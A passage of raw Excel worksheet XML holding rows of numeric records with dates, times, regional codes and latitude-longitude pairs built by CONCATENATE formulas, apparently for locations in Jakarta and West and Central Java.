      <c r="V2927" s="5" t="s">
        <v>17081</v>
      </c>
      <c r="W2927" s="5">
        <v>-616649</v>
      </c>
      <c r="X2927" t="s">
        <v>20797</v>
      </c>
      <c r="Y2927" t="str">
        <f t="shared" si="45"/>
        <v>-6.16649,106.77087</v>
      </c>
    </row>
    <row r="2928" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2928">
        <v>239124</v>
      </c>
      <c r="B2928" s="1">
        <v>44235</v>
      </c>
      <c r="C2928" s="2">
        <v>0.2678935185185185</v>
      </c>
      <c r="D2928" t="s">
        <v>22</v>
      </c>
      <c r="E2928" t="s">
        <v>23</v>
      </c>
      <c r="F2928" t="s">
        <v>9897</v>
      </c>
      <c r="G2928" t="s">
        <v>9898</v>
      </c>
      <c r="H2928" t="s">
        <v>26</v>
      </c>
      <c r="I2928" t="s">
        <v>197</v>
      </c>
      <c r="J2928" t="s">
        <v>2627</v>
      </c>
      <c r="L2928" t="s">
        <v>9899</v>
      </c>
      <c r="M2928">
        <v>3211130004</v>
      </c>
      <c r="N2928">
        <v>3211130</v>
      </c>
      <c r="O2928">
        <v>3211</v>
      </c>
      <c r="P2928">
        <v>32</v>
      </c>
      <c r="Q2928" t="s">
        <v>9900</v>
      </c>
      <c r="R2928" t="s">
        <v>9901</v>
      </c>
      <c r="S2928" t="s">
        <v>1797</v>
      </c>
      <c r="T2928" t="s">
        <v>42</v>
      </c>
      <c r="U2928" s="5">
        <v>10814893</v>
      </c>
      <c r="V2928" s="5" t="s">
        <v>17082</v>
      </c>
      <c r="W2928" s="5">
        <v>-673003</v>
      </c>
      <c r="X2928" t="s">
        <v>20822</v>
      </c>
      <c r="Y2928" t="str">
        <f t="shared" si="45"/>
        <v>-6.73003,108.14893</v>
      </c>
    </row>
    <row r="2929" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2929">
        <v>239304</v>
      </c>
      <c r="B2929" s="1">
        <v>44235</v>
      </c>
      <c r="C2929" s="2">
        <v>0.29598379629629629</v>
      </c>
      <c r="D2929" t="s">
        <v>22</v>
      </c>
      <c r="E2929" t="s">
        <v>23</v>
      </c>
      <c r="F2929" t="s">
        <v>9902</v>
      </c>
      <c r="G2929" t="s">
        <v>9903</v>
      </c>
      <c r="H2929" t="s">
        <v>26</v>
      </c>
      <c r="I2929" t="s">
        <v>3029</v>
      </c>
      <c r="J2929" t="s">
        <v>9904</v>
      </c>
      <c r="L2929" t="s">
        <v>9905</v>
      </c>
      <c r="M2929">
        <v>3374100006</v>
      </c>
      <c r="N2929">
        <v>3374100</v>
      </c>
      <c r="O2929">
        <v>3374</v>
      </c>
      <c r="P2929">
        <v>33</v>
      </c>
      <c r="Q2929" t="s">
        <v>9664</v>
      </c>
      <c r="R2929" t="s">
        <v>9608</v>
      </c>
      <c r="S2929" t="s">
        <v>1334</v>
      </c>
      <c r="T2929" t="s">
        <v>1134</v>
      </c>
      <c r="U2929" s="5">
        <v>11044857</v>
      </c>
      <c r="V2929" s="5" t="s">
        <v>17083</v>
      </c>
      <c r="W2929" s="5">
        <v>-696369</v>
      </c>
      <c r="X2929" t="s">
        <v>20823</v>
      </c>
      <c r="Y2929" t="str">
        <f t="shared" si="45"/>
        <v>-6.96369,110.44857</v>
      </c>
    </row>
    <row r="2930" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2930">
        <v>239353</v>
      </c>
      <c r="B2930" s="1">
        <v>44235</v>
      </c>
      <c r="C2930" s="2">
        <v>0.30313657407407407</v>
      </c>
      <c r="D2930" t="s">
        <v>22</v>
      </c>
      <c r="E2930" t="s">
        <v>23</v>
      </c>
      <c r="F2930" t="s">
        <v>9906</v>
      </c>
      <c r="G2930" t="s">
        <v>9907</v>
      </c>
      <c r="H2930" t="s">
        <v>26</v>
      </c>
      <c r="I2930" t="s">
        <v>1055</v>
      </c>
      <c r="J2930" t="s">
        <v>2627</v>
      </c>
      <c r="L2930" t="s">
        <v>9908</v>
      </c>
      <c r="M2930">
        <v>3216082004</v>
      </c>
      <c r="N2930">
        <v>3216082</v>
      </c>
      <c r="O2930">
        <v>3216</v>
      </c>
      <c r="P2930">
        <v>32</v>
      </c>
      <c r="Q2930" t="s">
        <v>5842</v>
      </c>
      <c r="R2930" t="s">
        <v>601</v>
      </c>
      <c r="S2930" t="s">
        <v>41</v>
      </c>
      <c r="T2930" t="s">
        <v>42</v>
      </c>
      <c r="U2930" s="5">
        <v>10704512</v>
      </c>
      <c r="V2930" s="5" t="s">
        <v>17084</v>
      </c>
      <c r="W2930" s="5">
        <v>-619592</v>
      </c>
      <c r="X2930" t="s">
        <v>20824</v>
      </c>
      <c r="Y2930" t="str">
        <f t="shared" si="45"/>
        <v>-6.19592,107.04512</v>
      </c>
    </row>
    <row r="2931" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2931">
        <v>239466</v>
      </c>
      <c r="B2931" s="1">
        <v>44235</v>
      </c>
      <c r="C2931" s="2">
        <v>0.32451388888888888</v>
      </c>
      <c r="D2931" t="s">
        <v>22</v>
      </c>
      <c r="E2931" t="s">
        <v>23</v>
      </c>
      <c r="F2931" t="s">
        <v>9909</v>
      </c>
      <c r="H2931" t="s">
        <v>26</v>
      </c>
      <c r="I2931" t="s">
        <v>7646</v>
      </c>
      <c r="J2931" t="s">
        <v>9910</v>
      </c>
      <c r="L2931" t="s">
        <v>9911</v>
      </c>
      <c r="M2931">
        <v>3374100006</v>
      </c>
      <c r="N2931">
        <v>3374100</v>
      </c>
      <c r="O2931">
        <v>3374</v>
      </c>
      <c r="P2931">
        <v>33</v>
      </c>
      <c r="Q2931" t="s">
        <v>9664</v>
      </c>
      <c r="R2931" t="s">
        <v>9608</v>
      </c>
      <c r="S2931" t="s">
        <v>1334</v>
      </c>
      <c r="T2931" t="s">
        <v>1134</v>
      </c>
      <c r="U2931" s="5">
        <v>11044756</v>
      </c>
      <c r="V2931" s="5" t="s">
        <v>17085</v>
      </c>
      <c r="W2931" s="5">
        <v>-696255</v>
      </c>
      <c r="X2931" t="s">
        <v>20825</v>
      </c>
      <c r="Y2931" t="str">
        <f t="shared" si="45"/>
        <v>-6.96255,110.44756</v>
      </c>
    </row>
    <row r="2932" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2932">
        <v>239723</v>
      </c>
      <c r="B2932" s="1">
        <v>44235</v>
      </c>
      <c r="C2932" s="2">
        <v>0.38108796296296293</v>
      </c>
      <c r="D2932" t="s">
        <v>22</v>
      </c>
      <c r="E2932" t="s">
        <v>23</v>
      </c>
      <c r="F2932" t="s">
        <v>9912</v>
      </c>
      <c r="G2932" t="s">
        <v>9913</v>
      </c>
      <c r="H2932" t="s">
        <v>26</v>
      </c>
      <c r="I2932" t="s">
        <v>271</v>
      </c>
      <c r="J2932" t="s">
        <v>2627</v>
      </c>
      <c r="L2932" t="s">
        <v>9914</v>
      </c>
      <c r="M2932">
        <v>3216090006</v>
      </c>
      <c r="N2932">
        <v>3216090</v>
      </c>
      <c r="O2932">
        <v>3216</v>
      </c>
      <c r="P2932">
        <v>32</v>
      </c>
      <c r="Q2932" t="s">
        <v>9915</v>
      </c>
      <c r="R2932" t="s">
        <v>335</v>
      </c>
      <c r="S2932" t="s">
        <v>41</v>
      </c>
      <c r="T2932" t="s">
        <v>42</v>
      </c>
      <c r="U2932" s="5">
        <v>10703806</v>
      </c>
      <c r="V2932" s="5" t="s">
        <v>17086</v>
      </c>
      <c r="W2932" s="5">
        <v>-612028</v>
      </c>
      <c r="X2932" t="s">
        <v>20826</v>
      </c>
      <c r="Y2932" t="str">
        <f t="shared" si="45"/>
        <v>-6.12028,107.03806</v>
      </c>
    </row>
    <row r="2933" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2933">
        <v>239772</v>
      </c>
      <c r="B2933" s="1">
        <v>44235</v>
      </c>
      <c r="C2933" s="2">
        <v>0.38980324074074074</v>
      </c>
      <c r="D2933" t="s">
        <v>22</v>
      </c>
      <c r="E2933" t="s">
        <v>23</v>
      </c>
      <c r="F2933" t="s">
        <v>9916</v>
      </c>
      <c r="G2933" t="s">
        <v>9917</v>
      </c>
      <c r="H2933" t="s">
        <v>26</v>
      </c>
      <c r="I2933" t="s">
        <v>974</v>
      </c>
      <c r="J2933" t="s">
        <v>2627</v>
      </c>
      <c r="L2933" t="s">
        <v>9918</v>
      </c>
      <c r="M2933">
        <v>3212030002</v>
      </c>
      <c r="N2933">
        <v>3212030</v>
      </c>
      <c r="O2933">
        <v>3212</v>
      </c>
      <c r="P2933">
        <v>32</v>
      </c>
      <c r="Q2933" t="s">
        <v>9919</v>
      </c>
      <c r="R2933" t="s">
        <v>9920</v>
      </c>
      <c r="S2933" t="s">
        <v>8471</v>
      </c>
      <c r="T2933" t="s">
        <v>42</v>
      </c>
      <c r="U2933" s="5">
        <v>10804228</v>
      </c>
      <c r="V2933" s="5" t="s">
        <v>17087</v>
      </c>
      <c r="W2933" s="5">
        <v>-644410</v>
      </c>
      <c r="X2933" t="s">
        <v>20827</v>
      </c>
      <c r="Y2933" t="str">
        <f t="shared" si="45"/>
        <v>-6.44410,108.04228</v>
      </c>
    </row>
    <row r="2934" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2934">
        <v>239833</v>
      </c>
      <c r="B2934" s="1">
        <v>44235</v>
      </c>
      <c r="C2934" s="2">
        <v>0.40540509259259255</v>
      </c>
      <c r="D2934" t="s">
        <v>22</v>
      </c>
      <c r="E2934" t="s">
        <v>23</v>
      </c>
      <c r="F2934" t="s">
        <v>9921</v>
      </c>
      <c r="G2934" t="s">
        <v>9922</v>
      </c>
      <c r="H2934" t="s">
        <v>26</v>
      </c>
      <c r="I2934" t="s">
        <v>3668</v>
      </c>
      <c r="J2934" t="s">
        <v>2627</v>
      </c>
      <c r="L2934" t="s">
        <v>9923</v>
      </c>
      <c r="M2934">
        <v>3212162003</v>
      </c>
      <c r="N2934">
        <v>3212162</v>
      </c>
      <c r="O2934">
        <v>3212</v>
      </c>
      <c r="P2934">
        <v>32</v>
      </c>
      <c r="Q2934" t="s">
        <v>9924</v>
      </c>
      <c r="R2934" t="s">
        <v>9925</v>
      </c>
      <c r="S2934" t="s">
        <v>8471</v>
      </c>
      <c r="T2934" t="s">
        <v>42</v>
      </c>
      <c r="U2934" s="5">
        <v>10834173</v>
      </c>
      <c r="V2934" s="5" t="s">
        <v>17088</v>
      </c>
      <c r="W2934" s="5">
        <v>-629412</v>
      </c>
      <c r="X2934" t="s">
        <v>20828</v>
      </c>
      <c r="Y2934" t="str">
        <f t="shared" si="45"/>
        <v>-6.29412,108.34173</v>
      </c>
    </row>
    <row r="2935" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2935">
        <v>239924</v>
      </c>
      <c r="B2935" s="1">
        <v>44235</v>
      </c>
      <c r="C2935" s="2">
        <v>0.4253703703703704</v>
      </c>
      <c r="D2935" t="s">
        <v>22</v>
      </c>
      <c r="E2935" t="s">
        <v>23</v>
      </c>
      <c r="F2935" t="s">
        <v>9926</v>
      </c>
      <c r="H2935" t="s">
        <v>26</v>
      </c>
      <c r="I2935" t="s">
        <v>657</v>
      </c>
      <c r="J2935" t="s">
        <v>9927</v>
      </c>
      <c r="L2935" t="s">
        <v>9928</v>
      </c>
      <c r="M2935">
        <v>3374090013</v>
      </c>
      <c r="N2935">
        <v>3374090</v>
      </c>
      <c r="O2935">
        <v>3374</v>
      </c>
      <c r="P2935">
        <v>33</v>
      </c>
      <c r="Q2935" t="s">
        <v>1361</v>
      </c>
      <c r="R2935" t="s">
        <v>1362</v>
      </c>
      <c r="S2935" t="s">
        <v>1334</v>
      </c>
      <c r="T2935" t="s">
        <v>1134</v>
      </c>
      <c r="U2935" s="5">
        <v>11046086</v>
      </c>
      <c r="V2935" s="5" t="s">
        <v>17089</v>
      </c>
      <c r="W2935" s="5">
        <v>-695629</v>
      </c>
      <c r="X2935" t="s">
        <v>20829</v>
      </c>
      <c r="Y2935" t="str">
        <f t="shared" si="45"/>
        <v>-6.95629,110.46086</v>
      </c>
    </row>
    <row r="2936" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2936">
        <v>239955</v>
      </c>
      <c r="B2936" s="1">
        <v>44235</v>
      </c>
      <c r="C2936" s="2">
        <v>0.43476851851851855</v>
      </c>
      <c r="D2936" t="s">
        <v>22</v>
      </c>
      <c r="E2936" t="s">
        <v>23</v>
      </c>
      <c r="F2936" t="s">
        <v>9929</v>
      </c>
      <c r="G2936" t="s">
        <v>9930</v>
      </c>
      <c r="H2936" t="s">
        <v>26</v>
      </c>
      <c r="I2936" t="s">
        <v>3024</v>
      </c>
      <c r="J2936" t="s">
        <v>875</v>
      </c>
      <c r="L2936" t="s">
        <v>9931</v>
      </c>
      <c r="M2936">
        <v>3174070002</v>
      </c>
      <c r="N2936">
        <v>3174070</v>
      </c>
      <c r="O2936">
        <v>3174</v>
      </c>
      <c r="P2936">
        <v>31</v>
      </c>
      <c r="Q2936" t="s">
        <v>621</v>
      </c>
      <c r="R2936" t="s">
        <v>84</v>
      </c>
      <c r="S2936" t="s">
        <v>32</v>
      </c>
      <c r="T2936" t="s">
        <v>33</v>
      </c>
      <c r="U2936" s="5">
        <v>10673319</v>
      </c>
      <c r="V2936" s="5" t="s">
        <v>17090</v>
      </c>
      <c r="W2936" s="5">
        <v>-616915</v>
      </c>
      <c r="X2936" t="s">
        <v>18811</v>
      </c>
      <c r="Y2936" t="str">
        <f t="shared" si="45"/>
        <v>-6.16915,106.73319</v>
      </c>
    </row>
    <row r="2937" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2937">
        <v>240196</v>
      </c>
      <c r="B2937" s="1">
        <v>44235</v>
      </c>
      <c r="C2937" s="2">
        <v>0.47190972222222222</v>
      </c>
      <c r="D2937" t="s">
        <v>85</v>
      </c>
      <c r="E2937" t="s">
        <v>23</v>
      </c>
      <c r="F2937" t="s">
        <v>9932</v>
      </c>
      <c r="G2937" t="s">
        <v>9933</v>
      </c>
      <c r="H2937" t="s">
        <v>26</v>
      </c>
      <c r="I2937" t="s">
        <v>6211</v>
      </c>
      <c r="J2937" t="s">
        <v>814</v>
      </c>
      <c r="K2937" t="s">
        <v>9934</v>
      </c>
      <c r="L2937" t="s">
        <v>9935</v>
      </c>
      <c r="M2937">
        <v>3172060007</v>
      </c>
      <c r="N2937">
        <v>3172060</v>
      </c>
      <c r="O2937">
        <v>3172</v>
      </c>
      <c r="P2937">
        <v>31</v>
      </c>
      <c r="Q2937" t="s">
        <v>817</v>
      </c>
      <c r="R2937" t="s">
        <v>48</v>
      </c>
      <c r="S2937" t="s">
        <v>49</v>
      </c>
      <c r="T2937" t="s">
        <v>33</v>
      </c>
      <c r="U2937" s="5">
        <v>10686434</v>
      </c>
      <c r="V2937" s="5" t="s">
        <v>15519</v>
      </c>
      <c r="W2937" s="5">
        <v>-621391</v>
      </c>
      <c r="X2937" t="s">
        <v>20830</v>
      </c>
      <c r="Y2937" t="str">
        <f t="shared" si="45"/>
        <v>-6.21391,106.86434</v>
      </c>
    </row>
    <row r="2938" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2938">
        <v>240303</v>
      </c>
      <c r="B2938" s="1">
        <v>44235</v>
      </c>
      <c r="C2938" s="2">
        <v>0.5083333333333333</v>
      </c>
      <c r="D2938" t="s">
        <v>2648</v>
      </c>
      <c r="E2938" t="s">
        <v>23</v>
      </c>
      <c r="G2938" t="s">
        <v>9936</v>
      </c>
      <c r="H2938" t="s">
        <v>26</v>
      </c>
      <c r="J2938" t="s">
        <v>9937</v>
      </c>
      <c r="L2938" t="s">
        <v>9938</v>
      </c>
      <c r="M2938">
        <v>3172060007</v>
      </c>
      <c r="N2938">
        <v>3172060</v>
      </c>
      <c r="O2938">
        <v>3172</v>
      </c>
      <c r="P2938">
        <v>31</v>
      </c>
      <c r="Q2938" t="s">
        <v>817</v>
      </c>
      <c r="R2938" t="s">
        <v>48</v>
      </c>
      <c r="S2938" t="s">
        <v>49</v>
      </c>
      <c r="T2938" t="s">
        <v>33</v>
      </c>
      <c r="U2938" s="5">
        <v>10686596</v>
      </c>
      <c r="V2938" s="5" t="s">
        <v>17091</v>
      </c>
      <c r="W2938" s="5">
        <v>-622294</v>
      </c>
      <c r="X2938" t="s">
        <v>20831</v>
      </c>
      <c r="Y2938" t="str">
        <f t="shared" si="45"/>
        <v>-6.22294,106.86596</v>
      </c>
    </row>
    <row r="2939" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2939">
        <v>240327</v>
      </c>
      <c r="B2939" s="1">
        <v>44235</v>
      </c>
      <c r="C2939" s="2">
        <v>0.51458333333333328</v>
      </c>
      <c r="D2939" t="s">
        <v>2648</v>
      </c>
      <c r="E2939" t="s">
        <v>23</v>
      </c>
      <c r="G2939" t="s">
        <v>9939</v>
      </c>
      <c r="H2939" t="s">
        <v>26</v>
      </c>
      <c r="I2939" t="s">
        <v>710</v>
      </c>
      <c r="J2939" t="s">
        <v>2905</v>
      </c>
      <c r="L2939" t="s">
        <v>9940</v>
      </c>
      <c r="M2939">
        <v>3171090005</v>
      </c>
      <c r="N2939">
        <v>3171090</v>
      </c>
      <c r="O2939">
        <v>3171</v>
      </c>
      <c r="P2939">
        <v>31</v>
      </c>
      <c r="Q2939" t="s">
        <v>1300</v>
      </c>
      <c r="R2939" t="s">
        <v>347</v>
      </c>
      <c r="S2939" t="s">
        <v>108</v>
      </c>
      <c r="T2939" t="s">
        <v>33</v>
      </c>
      <c r="U2939" s="5">
        <v>10686010</v>
      </c>
      <c r="V2939" s="5" t="s">
        <v>17092</v>
      </c>
      <c r="W2939" s="5">
        <v>-622146</v>
      </c>
      <c r="X2939" t="s">
        <v>20832</v>
      </c>
      <c r="Y2939" t="str">
        <f t="shared" si="45"/>
        <v>-6.22146,106.86010</v>
      </c>
    </row>
    <row r="2940" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2940">
        <v>240340</v>
      </c>
      <c r="B2940" s="1">
        <v>44235</v>
      </c>
      <c r="C2940" s="2">
        <v>0.51736111111111105</v>
      </c>
      <c r="D2940" t="s">
        <v>2648</v>
      </c>
      <c r="E2940" t="s">
        <v>23</v>
      </c>
      <c r="G2940" t="s">
        <v>9941</v>
      </c>
      <c r="H2940" t="s">
        <v>26</v>
      </c>
      <c r="J2940" t="s">
        <v>9942</v>
      </c>
      <c r="L2940" t="s">
        <v>9943</v>
      </c>
      <c r="M2940">
        <v>3172060001</v>
      </c>
      <c r="N2940">
        <v>3172060</v>
      </c>
      <c r="O2940">
        <v>3172</v>
      </c>
      <c r="P2940">
        <v>31</v>
      </c>
      <c r="Q2940" t="s">
        <v>309</v>
      </c>
      <c r="R2940" t="s">
        <v>48</v>
      </c>
      <c r="S2940" t="s">
        <v>49</v>
      </c>
      <c r="T2940" t="s">
        <v>33</v>
      </c>
      <c r="U2940" s="5">
        <v>10686652</v>
      </c>
      <c r="V2940" s="5" t="s">
        <v>17093</v>
      </c>
      <c r="W2940" s="5">
        <v>-622996</v>
      </c>
      <c r="X2940" t="s">
        <v>20833</v>
      </c>
      <c r="Y2940" t="str">
        <f t="shared" si="45"/>
        <v>-6.22996,106.86652</v>
      </c>
    </row>
    <row r="2941" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2941">
        <v>240355</v>
      </c>
      <c r="B2941" s="1">
        <v>44235</v>
      </c>
      <c r="C2941" s="2">
        <v>0.52013888888888882</v>
      </c>
      <c r="D2941" t="s">
        <v>2648</v>
      </c>
      <c r="E2941" t="s">
        <v>23</v>
      </c>
      <c r="G2941" t="s">
        <v>9944</v>
      </c>
      <c r="H2941" t="s">
        <v>26</v>
      </c>
      <c r="J2941" t="s">
        <v>9945</v>
      </c>
      <c r="L2941" t="s">
        <v>9946</v>
      </c>
      <c r="M2941">
        <v>3171080002</v>
      </c>
      <c r="N2941">
        <v>3171080</v>
      </c>
      <c r="O2941">
        <v>3171</v>
      </c>
      <c r="P2941">
        <v>31</v>
      </c>
      <c r="Q2941" t="s">
        <v>6986</v>
      </c>
      <c r="R2941" t="s">
        <v>1403</v>
      </c>
      <c r="S2941" t="s">
        <v>108</v>
      </c>
      <c r="T2941" t="s">
        <v>33</v>
      </c>
      <c r="U2941" s="5">
        <v>10685699</v>
      </c>
      <c r="V2941" s="5" t="s">
        <v>17094</v>
      </c>
      <c r="W2941" s="5">
        <v>-626229</v>
      </c>
      <c r="X2941" t="s">
        <v>20834</v>
      </c>
      <c r="Y2941" t="str">
        <f t="shared" si="45"/>
        <v>-6.26229,106.85699</v>
      </c>
    </row>
    <row r="2942" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2942">
        <v>240371</v>
      </c>
      <c r="B2942" s="1">
        <v>44235</v>
      </c>
      <c r="C2942" s="2">
        <v>0.52258101851851857</v>
      </c>
      <c r="D2942" t="s">
        <v>22</v>
      </c>
      <c r="E2942" t="s">
        <v>23</v>
      </c>
      <c r="F2942" t="s">
        <v>9947</v>
      </c>
      <c r="H2942" t="s">
        <v>26</v>
      </c>
      <c r="I2942" t="s">
        <v>65</v>
      </c>
      <c r="J2942" t="s">
        <v>2627</v>
      </c>
      <c r="L2942" t="s">
        <v>9948</v>
      </c>
      <c r="M2942">
        <v>3215150006</v>
      </c>
      <c r="N2942">
        <v>3215150</v>
      </c>
      <c r="O2942">
        <v>3215</v>
      </c>
      <c r="P2942">
        <v>32</v>
      </c>
      <c r="Q2942" t="s">
        <v>9949</v>
      </c>
      <c r="R2942" t="s">
        <v>9950</v>
      </c>
      <c r="S2942" t="s">
        <v>3979</v>
      </c>
      <c r="T2942" t="s">
        <v>42</v>
      </c>
      <c r="U2942" s="5">
        <v>10728817</v>
      </c>
      <c r="V2942" s="5" t="s">
        <v>17095</v>
      </c>
      <c r="W2942" s="5">
        <v>-615680</v>
      </c>
      <c r="X2942" t="s">
        <v>20835</v>
      </c>
      <c r="Y2942" t="str">
        <f t="shared" si="45"/>
        <v>-6.15680,107.28817</v>
      </c>
    </row>
    <row r="2943" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2943">
        <v>240410</v>
      </c>
      <c r="B2943" s="1">
        <v>44235</v>
      </c>
      <c r="C2943" s="2">
        <v>0.52916666666666667</v>
      </c>
      <c r="D2943" t="s">
        <v>2648</v>
      </c>
      <c r="E2943" t="s">
        <v>23</v>
      </c>
      <c r="G2943" t="s">
        <v>9951</v>
      </c>
      <c r="H2943" t="s">
        <v>26</v>
      </c>
      <c r="J2943" t="s">
        <v>2905</v>
      </c>
      <c r="L2943" t="s">
        <v>9952</v>
      </c>
      <c r="M2943">
        <v>3171090005</v>
      </c>
      <c r="N2943">
        <v>3171090</v>
      </c>
      <c r="O2943">
        <v>3171</v>
      </c>
      <c r="P2943">
        <v>31</v>
      </c>
      <c r="Q2943" t="s">
        <v>1300</v>
      </c>
      <c r="R2943" t="s">
        <v>347</v>
      </c>
      <c r="S2943" t="s">
        <v>108</v>
      </c>
      <c r="T2943" t="s">
        <v>33</v>
      </c>
      <c r="U2943" s="5">
        <v>10685990</v>
      </c>
      <c r="V2943" s="5" t="s">
        <v>17096</v>
      </c>
      <c r="W2943" s="5">
        <v>-622106</v>
      </c>
      <c r="X2943" t="s">
        <v>20836</v>
      </c>
      <c r="Y2943" t="str">
        <f t="shared" si="45"/>
        <v>-6.22106,106.85990</v>
      </c>
    </row>
    <row r="2944" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2944">
        <v>240427</v>
      </c>
      <c r="B2944" s="1">
        <v>44235</v>
      </c>
      <c r="C2944" s="2">
        <v>0.53238425925925925</v>
      </c>
      <c r="D2944" t="s">
        <v>22</v>
      </c>
      <c r="E2944" t="s">
        <v>23</v>
      </c>
      <c r="F2944" t="s">
        <v>9953</v>
      </c>
      <c r="G2944" t="s">
        <v>9954</v>
      </c>
      <c r="H2944" t="s">
        <v>26</v>
      </c>
      <c r="I2944" t="s">
        <v>9955</v>
      </c>
      <c r="J2944" t="s">
        <v>2627</v>
      </c>
      <c r="L2944" t="s">
        <v>9956</v>
      </c>
      <c r="M2944">
        <v>3216090002</v>
      </c>
      <c r="N2944">
        <v>3216090</v>
      </c>
      <c r="O2944">
        <v>3216</v>
      </c>
      <c r="P2944">
        <v>32</v>
      </c>
      <c r="Q2944" t="s">
        <v>6142</v>
      </c>
      <c r="R2944" t="s">
        <v>335</v>
      </c>
      <c r="S2944" t="s">
        <v>41</v>
      </c>
      <c r="T2944" t="s">
        <v>42</v>
      </c>
      <c r="U2944" s="5">
        <v>10704150</v>
      </c>
      <c r="V2944" s="5" t="s">
        <v>17097</v>
      </c>
      <c r="W2944" s="5">
        <v>-618739</v>
      </c>
      <c r="X2944" t="s">
        <v>20837</v>
      </c>
      <c r="Y2944" t="str">
        <f t="shared" si="45"/>
        <v>-6.18739,107.04150</v>
      </c>
    </row>
    <row r="2945" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2945">
        <v>240496</v>
      </c>
      <c r="B2945" s="1">
        <v>44235</v>
      </c>
      <c r="C2945" s="2">
        <v>0.53541666666666665</v>
      </c>
      <c r="D2945" t="s">
        <v>2648</v>
      </c>
      <c r="E2945" t="s">
        <v>23</v>
      </c>
      <c r="G2945" t="s">
        <v>9957</v>
      </c>
      <c r="H2945" t="s">
        <v>26</v>
      </c>
      <c r="J2945" t="s">
        <v>8233</v>
      </c>
      <c r="L2945" t="s">
        <v>9958</v>
      </c>
      <c r="M2945">
        <v>3172020005</v>
      </c>
      <c r="N2945">
        <v>3172020</v>
      </c>
      <c r="O2945">
        <v>3172</v>
      </c>
      <c r="P2945">
        <v>31</v>
      </c>
      <c r="Q2945" t="s">
        <v>3744</v>
      </c>
      <c r="R2945" t="s">
        <v>1644</v>
      </c>
      <c r="S2945" t="s">
        <v>49</v>
      </c>
      <c r="T2945" t="s">
        <v>33</v>
      </c>
      <c r="U2945" s="5">
        <v>10687451</v>
      </c>
      <c r="V2945" s="5" t="s">
        <v>17098</v>
      </c>
      <c r="W2945" s="5">
        <v>-630220</v>
      </c>
      <c r="X2945" t="s">
        <v>20838</v>
      </c>
      <c r="Y2945" t="str">
        <f t="shared" si="45"/>
        <v>-6.30220,106.87451</v>
      </c>
    </row>
    <row r="2946" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2946">
        <v>240559</v>
      </c>
      <c r="B2946" s="1">
        <v>44235</v>
      </c>
      <c r="C2946" s="2">
        <v>0.56180555555555556</v>
      </c>
      <c r="D2946" t="s">
        <v>2648</v>
      </c>
      <c r="E2946" t="s">
        <v>23</v>
      </c>
      <c r="G2946" t="s">
        <v>9959</v>
      </c>
      <c r="H2946" t="s">
        <v>26</v>
      </c>
      <c r="J2946" t="s">
        <v>530</v>
      </c>
      <c r="L2946" t="s">
        <v>9960</v>
      </c>
      <c r="M2946">
        <v>3174020006</v>
      </c>
      <c r="N2946">
        <v>3174020</v>
      </c>
      <c r="O2946">
        <v>3174</v>
      </c>
      <c r="P2946">
        <v>31</v>
      </c>
      <c r="Q2946" t="s">
        <v>427</v>
      </c>
      <c r="R2946" t="s">
        <v>31</v>
      </c>
      <c r="S2946" t="s">
        <v>32</v>
      </c>
      <c r="T2946" t="s">
        <v>33</v>
      </c>
      <c r="U2946" s="5">
        <v>10675729</v>
      </c>
      <c r="V2946" s="5" t="s">
        <v>16291</v>
      </c>
      <c r="W2946" s="5">
        <v>-618682</v>
      </c>
      <c r="X2946" t="s">
        <v>20839</v>
      </c>
      <c r="Y2946" t="str">
        <f t="shared" si="45"/>
        <v>-6.18682,106.75729</v>
      </c>
    </row>
    <row r="2947" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2947">
        <v>240576</v>
      </c>
      <c r="B2947" s="1">
        <v>44235</v>
      </c>
      <c r="C2947" s="2">
        <v>0.56458333333333333</v>
      </c>
      <c r="D2947" t="s">
        <v>2648</v>
      </c>
      <c r="E2947" t="s">
        <v>23</v>
      </c>
      <c r="G2947" t="s">
        <v>9961</v>
      </c>
      <c r="H2947" t="s">
        <v>26</v>
      </c>
      <c r="J2947" t="s">
        <v>9962</v>
      </c>
      <c r="L2947" t="s">
        <v>9963</v>
      </c>
      <c r="M2947">
        <v>3175010001</v>
      </c>
      <c r="N2947">
        <v>3175010</v>
      </c>
      <c r="O2947">
        <v>3175</v>
      </c>
      <c r="P2947">
        <v>31</v>
      </c>
      <c r="Q2947" t="s">
        <v>1618</v>
      </c>
      <c r="R2947" t="s">
        <v>546</v>
      </c>
      <c r="S2947" t="s">
        <v>547</v>
      </c>
      <c r="T2947" t="s">
        <v>33</v>
      </c>
      <c r="U2947" s="5">
        <v>10671530</v>
      </c>
      <c r="V2947" s="5" t="s">
        <v>14562</v>
      </c>
      <c r="W2947" s="5">
        <v>-610105</v>
      </c>
      <c r="X2947" t="s">
        <v>20840</v>
      </c>
      <c r="Y2947" t="str">
        <f t="shared" ref="Y2947:Y3010" si="46">CONCATENATE(X2947,",",V2947)</f>
        <v>-6.10105,106.71530</v>
      </c>
    </row>
    <row r="2948" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2948">
        <v>240594</v>
      </c>
      <c r="B2948" s="1">
        <v>44235</v>
      </c>
      <c r="C2948" s="2">
        <v>0.56666666666666665</v>
      </c>
      <c r="D2948" t="s">
        <v>2648</v>
      </c>
      <c r="E2948" t="s">
        <v>23</v>
      </c>
      <c r="G2948" t="s">
        <v>9964</v>
      </c>
      <c r="H2948" t="s">
        <v>26</v>
      </c>
      <c r="J2948" t="s">
        <v>9962</v>
      </c>
      <c r="L2948" t="s">
        <v>9965</v>
      </c>
      <c r="M2948">
        <v>3174080004</v>
      </c>
      <c r="N2948">
        <v>3174080</v>
      </c>
      <c r="O2948">
        <v>3174</v>
      </c>
      <c r="P2948">
        <v>31</v>
      </c>
